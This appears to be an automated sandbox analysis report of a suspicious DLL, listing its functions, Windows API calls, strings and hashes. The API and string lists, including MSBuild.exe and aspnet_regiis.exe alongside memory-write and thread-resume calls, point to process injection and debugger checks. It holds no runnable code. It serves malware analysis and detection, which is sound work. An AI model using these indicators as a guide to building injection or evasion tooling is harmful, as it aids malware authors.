ntdll.dll, xrefs: 6CC250BF
}g`, xrefs: 6CC254AF
KTC, xrefs: 6CC28E0D
[5RE, xrefs: 6CC2619D
_/M[, xrefs: 6CC26E24
Gx|, xrefs: 6CC284E2

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtual$CloseHandleWindowWow64$ConsoleCreateReadResumeShow
String ID: EEW$EEW$,`t$50PR$6Ylf$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$Gx|$JrT$KTC$KTC$MR4d$[5RE$_/M[$ie$kernel32.dll$nk^O$ntdll.dll$}g`
API String ID: 4105961754-2537180500
Opcode ID: 7654cae33c08d3d453aec4e8c87821d535f184e99de1b437e7a92d532ecf63d9
Instruction ID: 6bc3ba20dc46a3c2b25a080a97448156d439802e17a4378e0b3f71bd6c36c1bb
Opcode Fuzzy Hash: 7654cae33c08d3d453aec4e8c87821d535f184e99de1b437e7a92d532ecf63d9
Instruction Fuzzy Hash: 64B3D532A48619CFCF14CF3ECD803D9B7F1BB4A354F148299D429E7694E6399A898F41

Function 6CC211C0 Relevance: 31.0, APIs: 15, Strings: 2, Instructions: 1202
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 6CC211D9
GetModuleHandleA.KERNEL32 ref: 6CC21754
K32GetModuleInformation.KERNEL32 ref: 6CC2189A
GetModuleFileNameA.KERNEL32 ref: 6CC2190B
CreateFileA.KERNELBASE ref: 6CC2194F
CreateFileMappingA.KERNEL32 ref: 6CC21A14
VirtualProtect.KERNELBASE ref: 6CC22154
FindCloseChangeNotification.KERNELBASE ref: 6CC2246B
CloseHandle.KERNEL32 ref: 6CC2247D
CloseHandle.KERNEL32 ref: 6CC2249E
CreateFileMappingA.KERNEL32 ref: 6CC2250D

Strings

.text, xrefs: 6CC21F34
@, xrefs: 6CC22597

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleModule$Mapping$ChangeCurrentFindInformationNameNotificationProcessProtectVirtual
String ID: .text$@
API String ID: 3657056315-3116941980
Opcode ID: 14657b2219e01de32275b217ea80cfacb7cdcd0f37c54a0d8ed1c7bcc255efee
Instruction ID: 7cfdac790ee0061eec7b2532bfa24e1d7371d9258e42d4390e0fa5d344260a20
Opcode Fuzzy Hash: 14657b2219e01de32275b217ea80cfacb7cdcd0f37c54a0d8ed1c7bcc255efee
Instruction Fuzzy Hash: 57A2AC76A052548FCB15CF2DC998BDAB7F1BB4A324F108299D409DBB45E73ACE858F01

Function 6CC22630 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 423
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ntdll.dll, xrefs: 6CC2280D
NtQueryInformationProcess, xrefs: 6CC22821

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID:
String ID: NtQueryInformationProcess$ntdll.dll
API String ID: 0-2906145389
Opcode ID: 8eb6b93bce08b63c98c446bb257a1770ac790b498c7c3a63548c2c287c1fcff0
Instruction ID: df9368e3f5dcb3991442a1e993f4d47081cacd4178eafe363de0148b7a17b0f1
Opcode Fuzzy Hash: 8eb6b93bce08b63c98c446bb257a1770ac790b498c7c3a63548c2c287c1fcff0
Instruction Fuzzy Hash: 82E1E2B2A252059FDF04CE7DD9E97DD7BF2BB46320F14461AE411EB794E23E88498B01

Function 6CC2A198 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CC2A1DF
___scrt_uninitialize_crt.LIBCMT ref: 6CC2A1F9

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 016e210cf118c404f622bbd67679edd82150c70082cc4a9d81d0853a6f5f4e99
Instruction ID: 379c30e5f34a50f1f17161152a4693fa7ec1dae2ca2fa17e59f7a37c60c903cf
Opcode Fuzzy Hash: 016e210cf118c404f622bbd67679edd82150c70082cc4a9d81d0853a6f5f4e99
Instruction Fuzzy Hash: CF411472E05214EFDB108F5ACC40BEE7774EBC5BA8F114116E818A7B50F37989468BA0

Function 6CC2A248 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6CC2A285
dllmain_crt_dispatch.LIBCMT ref: 6CC2A29C
dllmain_raw.LIBCMT ref: 6CC2A2E4
dllmain_crt_dispatch.LIBCMT ref: 6CC2A2F7
dllmain_raw.LIBCMT ref: 6CC2A30A

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: c32296c178b1a4838ad48b50a7fb34857fc838783765dbe22e8e24b37af6eda7
Instruction ID: 494aacb37f25403af744a07eb28047f6fedbbcee83ceaec9fae5019ecdb932d0
Opcode Fuzzy Hash: c32296c178b1a4838ad48b50a7fb34857fc838783765dbe22e8e24b37af6eda7
Instruction Fuzzy Hash: DD219272D05625EFCB218F56CC40AAF7A79EBC5A98B154215F81967B10E33ACD428BD0

Function 6CC300BF Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6CC300C7

Part of subcall function 6CC3001C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CC32080,?,00000000,-00000008), ref: 6CC3007D

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CC300FF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CC3011F

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: d035b5c77083f26ba8c813750608dd781d8cc287afc7439b4e876142ee97c3e2
Instruction ID: 8313fd225f5c99f25358002326c5cd406d11956413b9f9ada32903089dc1c07e
Opcode Fuzzy Hash: d035b5c77083f26ba8c813750608dd781d8cc287afc7439b4e876142ee97c3e2
Instruction Fuzzy Hash: 141104B3605A65BFAB1117766C88CEF7A7CEE462983042024F50AE1600FB34CD0591B5

Function 6CC2A091 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CC2A0DE

Part of subcall function 6CC2A55B: InitializeSListHead.KERNEL32(6CC63220,6CC2A0E8,6CC3B650,00000010,6CC2A079,?,?,?,6CC2A2A1,?,00000001,?,?,00000001,?,6CC3B698), ref: 6CC2A560

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CC2A148

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 02171c895b2c2067a1726468a8559c7fa911c0910aeb9519eb5093b4655aa61c
Instruction ID: d5e2932aa56552a8b7444492c276c13805eb8b964f66abb569dcc0b141e90762
Opcode Fuzzy Hash: 02171c895b2c2067a1726468a8559c7fa911c0910aeb9519eb5093b4655aa61c
Instruction Fuzzy Hash: 0D212432648A11EADF14ABB598007DD77B0AF8237CF101419D644EBFC2FB2D804DD655

Function 6CC306BC Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6CC30708
GetFileType.KERNELBASE(00000000), ref: 6CC3071A

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: af8699d7400a7ac3dd197523864f30b2bf9734d4ae79a7aee0ac41a33d60d7aa
Instruction ID: 2cfc40d0e3c2e5098d65c7db6ee1a6988f1b5fefd90bdc5bcfd5759129d2be70
Opcode Fuzzy Hash: af8699d7400a7ac3dd197523864f30b2bf9734d4ae79a7aee0ac41a33d60d7aa
Instruction Fuzzy Hash: 1E11B773604BA146C7304E3FAC8C7527EA4B787234B34171AD4BEC69F1E231D486CA84

Function 6CC3107A Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,6CC2F9C7,6CC30D94,?,6CC2F9C7,00000220,?,?,6CC30D94), ref: 6CC310AC

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c68b3e64d2e17efe3ce9ff0553e94774ee9c6f344224f406b72158fc0b5f16ef
Instruction ID: 4a593232b2f7cb571e7c818792e9d4f6e8fa46911d70d8a43a742fb8c3b30068
Opcode Fuzzy Hash: c68b3e64d2e17efe3ce9ff0553e94774ee9c6f344224f406b72158fc0b5f16ef
Instruction Fuzzy Hash: DAE0E5316416B05EEB20267EBC0078A369CAB423B5F106226DC1C96E90FF28C40696E6

Non-executed Functions

Function 6CC2A87A Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6CC2A886
IsDebuggerPresent.KERNEL32 ref: 6CC2A952
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CC2A96B
UnhandledExceptionFilter.KERNEL32(?), ref: 6CC2A975

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 75665ceb5497c00c0f960f7b08db7e023d5bf79f360aeb584c80013792886822
Instruction ID: 102b4f0a1efc5fdc27ad726d37e9f5fb7f5a8bc4e2b64a0f27b28001c182a7fd
Opcode Fuzzy Hash: 75665ceb5497c00c0f960f7b08db7e023d5bf79f360aeb584c80013792886822
Instruction Fuzzy Hash: C33127B5D05218DBDF20EFA1D8497CDBBB8BF08304F1041AAE40CAB240EB759A85CF44

Function 6CC2E817 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CC2E90F
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CC2E919
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CC2E926

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e1409231d6b444f2dace346e1dd02987c92e27b5dab42fc0544eedfe809ff8fc
Instruction ID: 2adaaedba9eaee186d408355647dc7c11a1fcd12fddb2efa8278c31071dbcdc4
Opcode Fuzzy Hash: e1409231d6b444f2dace346e1dd02987c92e27b5dab42fc0544eedfe809ff8fc
Instruction Fuzzy Hash: 5E31E474D1122C9BCB21DF25D888BCDBBB8BF48314F5042EAE41CA7250E7749B858F44

Function 6CC35465 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CC35460,?,?,00000008,?,?,6CC35063,00000000), ref: 6CC35692

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 6122351244b5fa69691aad4eae9c139040952f40d04bea6e0d12e331ac371b4e
Instruction ID: d3b843a6f8bb1c763336842ca1a627ec9924115e00ccd8b7da78a2e3e7c52b90
Opcode Fuzzy Hash: 6122351244b5fa69691aad4eae9c139040952f40d04bea6e0d12e331ac371b4e
Instruction Fuzzy Hash: BDB17A71621618CFD705CF28D48AB947BE1FF05368F259698E8ADCF6A1D335E981CB40

Function 6CC2AA38 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CC2AA4E

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: be426cb0956ffa7f31240104719ea90889014cc9e362363eab80f9cc41c1a0ad
Instruction ID: 6e8f9c7680e15ab6b8762100115b2abb7e1335fbf50d769a8b74299ae070c1df
Opcode Fuzzy Hash: be426cb0956ffa7f31240104719ea90889014cc9e362363eab80f9cc41c1a0ad
Instruction Fuzzy Hash: 75517BB1A05209CFEB14CF5BC6957AABBF0FB89318F24812AD415EB642E779D940CF50

Function 6CC305EB Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6CC305EB

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 7a5d90f78752caa2beaa10c6435b2705686ea6766ffd675a5b449f3d4cf0adc5
Instruction ID: e1610709d240304b4e267542b3ad06f82be9535afba52531fcf444a394375833
Opcode Fuzzy Hash: 7a5d90f78752caa2beaa10c6435b2705686ea6766ffd675a5b449f3d4cf0adc5
Instruction Fuzzy Hash: FAA001B0B05A018B9B608F37970A21D7ABDBA46AA17098169A40AC6251EA24C564AF62

Function 6CC29A80 Relevance: .4, Instructions: 374COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fde24b933b15b15c0d95f0b7daca58f946de842e526e1702bcafab3c7499da8d
Instruction ID: 1ad334017f5200f266ea7e4f761b258083b236a019d2e4317f96f5832e7b3386
Opcode Fuzzy Hash: fde24b933b15b15c0d95f0b7daca58f946de842e526e1702bcafab3c7499da8d
Instruction Fuzzy Hash: 8AD10275A452068FCF048F6DC9D13EEBBB2BB86310F20451AD823EBB54E63E85469B51

Function 6CC22C50 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24fbb1be7e26d7b34aa241df392df105736e3009afe7e17848da53c6877a9f6e
Instruction ID: d936d95053e0cc611a97bde5ea1257b964103f26c0f89e268cb373e4095be281
Opcode Fuzzy Hash: 24fbb1be7e26d7b34aa241df392df105736e3009afe7e17848da53c6877a9f6e
Instruction Fuzzy Hash: 4881D372F242158FCB08CE7CC9A92DD7BF1AB4A330F248319E925EB7D4D63999058B54

Function 6CC21000 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1699820722.000000006CC21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000000.00000002.1699797065.000000006CC20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699848123.000000006CC36000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aac7f9cbab225d44b92fff4d8d45e622ff7906ffa9c21de2632209762d4868b2
Instruction ID: a874f31ef42c342a0a6af3eb2df1c8d8edf26a37aac012dbf807bcccb054a1bb
Opcode Fuzzy Hash: aac7f9cbab225d44b92fff4d8d45e622ff7906ffa9c21de2632209762d4868b2
Instruction Fuzzy Hash: 7241D272E042498FDF08CE6EC9906DEBBF1EF8A360F145219D425E7790D63A9D06CB51

Function 6CC521B0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, Offset: 6CC3D000, based on PE: true

Associated: 00000000.00000002.1699865852.000000006CC62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1699912287.000000006CC64000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc20000_f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 6CC5591A Relevance: 129.2, APIs: 86, Instructions: 188
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6CC5592E
